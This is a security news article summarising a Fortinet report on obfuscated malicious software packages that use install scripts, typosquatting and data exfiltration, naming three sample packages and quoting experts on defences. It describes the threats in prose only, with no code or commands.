- 3 Apple devices you definitely shouldn't buy this month (and 10 to get instead)
- I tested a dual-screen Windows laptop - and it gave me a big productivity boost
- Will synthetic data derail generative AI's momentum or be the breakthrough we need?
- The most versatile portable battery I've tested can do more than just output 300W of power
- Billions of Devices at Risk of Hacking Due to Hidden Commands
Surge in Malicious Software Packages Exploits System Flaws
A rise in malicious software packages exploiting system vulnerabilities has been detected by security researchers.
A new report, published by Fortinet today, analyzes threats observed from November 2024 onward, revealing how attackers deploy lightweight, obfuscated packages to infiltrate systems undetected.
The research identified multiple malicious software packages, revealing various techniques used by attackers to evade detection and compromise systems:
- 1082 packages featured low file counts, designed to minimize detection while executing harmful actions
- 1052 packages contained install scripts that silently deployed malicious code
- 1043 lacked repository URLs, making it difficult to trace their legitimacy
- 974 included suspicious URLs linked to command-and-control (C2) servers
- 681 utilized APIs like https.get and https.request to exfiltrate data
- 537 had empty descriptions, obscuring their true intent
- 164 used excessively high version numbers to mislead users
Defense Bypass Tactics Used by Attackers
Attackers increasingly rely on methods like obfuscation, command overwrites and typosquatting to bypass traditional defenses.
Some malicious packages leverage suspicious install scripts, embedding API calls to transmit sensitive data to external servers. Others exploit missing metadata or repository URLs to evade scrutiny.
Fortinet identified several high-risk packages, including:
- AffineQuant-99.6 (Python), which utilized setup.py to exfiltrate system data, including MAC addresses and usernames
- seller-admin-common_6.5.8 (Node.js), which harvested system details and transmitted them via a Discord webhook
- xeno.dll_1.0.2 (JavaScript), which deployed a keylogger and backdoor for remote access, capturing passwords and credit card data
Strengthening Cyber Defenses
In the face of these threats, FortiGuard Labs emphasized that static detection alone is insufficient.
“Organizations should establish strong API discovery processes to achieve full visibility of their API environment, including shadow APIs that could be susceptible to attacks,” explained Eric Schwake, director of cybersecurity strategy at Salt Security.
“Effective API posture governance is essential to ensure that APIs are developed, deployed and managed with security as a priority, following best practices and industry standards.”
Jason Soroko, a senior fellow at Sectigo, echoed Schwake’s sentiment, adding that lean, obfuscated packages often slip past conventional security tools.
“Conventional tools must adapt to detect subtle evasion techniques like command overwrites and typosquatting, while robust, adaptive defenses become critical in verifying software legitimacy amidst increasingly ambiguous threat landscapes,” Soroko said.
Organizations are urged to implement proactive security measures such as regular vulnerability scans, strict API governance and advanced threat monitoring tools to counter emerging cyber threats effectively.
Read more on API-related threats: AI Surge Drives Record 1205% Increase in API Vulnerabilities
